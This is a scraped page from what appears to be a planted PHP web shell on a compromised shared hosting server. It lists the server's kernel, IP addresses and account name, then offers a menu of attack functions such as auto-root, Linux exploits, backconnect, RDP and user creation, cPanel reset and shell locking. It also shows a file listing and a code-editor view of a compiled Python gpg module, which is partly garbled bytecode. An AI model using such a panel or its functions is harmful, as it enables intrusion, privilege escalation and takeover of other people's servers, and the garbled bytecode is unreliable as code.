Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.22
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
python3.6 /
site-packages /
gpg /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-36.opt-1.pyc
3.97
KB
-rw-r--r--
__init__.cpython-36.pyc
3.97
KB
-rw-r--r--
callbacks.cpython-36.opt-1.pyc
1.14
KB
-rw-r--r--
callbacks.cpython-36.pyc
1.14
KB
-rw-r--r--
core.cpython-36.opt-1.pyc
51.97
KB
-rw-r--r--
core.cpython-36.pyc
52.09
KB
-rw-r--r--
errors.cpython-36.opt-1.pyc
7.92
KB
-rw-r--r--
errors.cpython-36.pyc
7.92
KB
-rw-r--r--
gpgme.cpython-36.opt-1.pyc
146.72
KB
-rw-r--r--
gpgme.cpython-36.pyc
146.72
KB
-rw-r--r--
results.cpython-36.opt-1.pyc
3.77
KB
-rw-r--r--
results.cpython-36.pyc
3.77
KB
-rw-r--r--
util.cpython-36.opt-1.pyc
1.52
KB
-rw-r--r--
util.cpython-36.pyc
1.52
KB
-rw-r--r--
version.cpython-36.opt-1.pyc
2.13
KB
-rw-r--r--
version.cpython-36.pyc
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.cpython-36.pyc
3 U�\� � @ s� d Z ddlmZmZmZ ddlmZ ddlmZ ddlmZ ddlm Z ddlm Z dd lmZ dd lmZ ddlm Z [[[dZ[ee eeee e egZ[d dddddddgZdS )a� gpg: GnuPG Interface for Python (GPGME bindings) Welcome to gpg, the GnuPG Interface for Python. The latest release of this package may be obtained from https://www.gnupg.org FEATURES -------- * Feature-rich, full implementation of the GPGME library. Supports all GPGME features. Callback functions may be written in pure Python. Exceptions raised in callbacks are properly propagated. * Ability to sign, encrypt, decrypt, and verify data. * Ability to list keys, export and import keys, and manage the keyring. * Fully object-oriented with convenient classes and modules. QUICK EXAMPLE ------------- >>> import gpg >>> with gpg.Context() as c: >>> with gpg.Context() as c: ... cipher, _, _ = c.encrypt("Hello world :)".encode(), ... passphrase="abc") ... c.decrypt(cipher, passphrase="abc") ... (b'Hello world :)', <gpg.results.DecryptResult object at 0x7f5ab8121080>, <gpg.results.VerifyResult object at 0x7f5ab81219b0>) GENERAL OVERVIEW ---------------- For those of you familiar with GPGME, you will be right at home here. The python gpg module is, for the most part, a direct interface to the C GPGME library. However, it is re-packaged in a more Pythonic way -- object-oriented with classes and modules. Take a look at the classes defined here -- they correspond directly to certain object types in GPGME for C. For instance, the following C code: gpgme_ctx_t context; gpgme_new(&context); ... gpgme_op_encrypt(context, recp, 1, plain, cipher); Translates into the following Python code: context = core.Context() ... context.op_encrypt(recp, 1, plain, cipher) The Python module automatically does error-checking and raises Python exception gpg.errors.GPGMEError when GPGME signals an error. getcode() and getsource() of this exception return code and source of the error. IMPORTANT NOTE -------------- This documentation only covers a small subset of available GPGME functions and methods. Please consult the documentation for the C library for comprehensive coverage. This library uses Python's reflection to automatically detect the methods that are available for each class, and as such, most of those methods do not appear explicitly anywhere. You can use dir() python built-in command on an object to see what methods and fields it has but their meaning can often only be found in the GPGME documentation. HIGHER LEVEL PYTHONIC LAYER --------------------------- A more pythonic or intuitive layer is being added above the automatically generated lower level bindings. This is the recommended way to access the module as if it is ever necessary to modify the underlying GPGME API, the higher level methods will remain the same. The quick example above is an example of this higher layer in action, whereas the second example demonstrating the mapping to GPGME itself is the lower layer. The second example in the higher layer would be more like the encrypt line in the quick example. FOR MORE INFORMATION -------------------- GnuPG homepage: https://www.gnupg.org/ GPGME documentation: https://www.gnupg.org/documentation/manuals/gpgme/ GPGME Python HOWTO: http://files.au.adversary.org/crypto/gpgme-python-howto-split/index.html To view this documentation, run help(gpg) in Python or one of the following commands outside of Python: pydoc gpg pydoc3 gpg python -m pydoc gpg python3 -m pydoc gpg � )�absolute_import�print_function�unicode_literals� )�core)�errors)� constants)�util)� callbacks)�version)�Context)�DataNr r r r r r r r )�__doc__Z __future__r r r � r r r r r r r r Zgpgme�_�__all__� r r � /usr/lib64/python3.6/__init__.py�<module>w s
Close